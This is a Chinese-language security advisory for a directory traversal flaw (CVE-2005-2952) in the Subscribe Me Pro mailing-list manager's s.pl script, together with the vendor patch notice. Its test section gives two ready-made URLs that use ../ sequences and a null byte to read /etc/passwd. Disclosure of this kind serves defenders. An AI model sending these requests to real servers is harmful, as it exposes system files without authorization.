发布日期：2005-09-12
更新日期：2005-09-12

受影响系统：

Subscribe Me Pro Subscribe Me Pro 2.44.09P

不受影响系统：

Subscribe Me Pro Subscribe Me Pro 2.50.01P

描述：

---

BUGTRAQ  ID: 14817
CVE(CAN) ID: CVE-2005-2952

Subscribe Me Pro是一款基于Web的邮件列表管理系统。

Subscribe Me Pro在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞遍历服务器目录，以Web进程权限访问任意文件。

Subscribe Me Pro的s.pl脚本没有充分检查过滤l参数的内容，远程攻击者可以在数据中插入“../../”类似的目录遍历串，从而访问系统上的任意权限。

<**>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.example.com/[dir]/s.pl?e=1&subscribe=subscribe&l=../../../../../../../../etc/passwd%00&SUBMIT=%20%20Submit%20%20
http://www.example.com/[dir]/s.pl?e=enter%20your%20email%20address%20here&subscribe=subscribe&l=../../../../../../../../etc/passwd%00

建议：

---

厂商补丁：

Subscribe Me Pro
----------------
目前厂商已经在最新版本的软件中修复了这个安全问题，请到厂商的主页下载：

http://siteinteractive.com/subpro/

浏览次数：2166
严重程度：0（网友投票）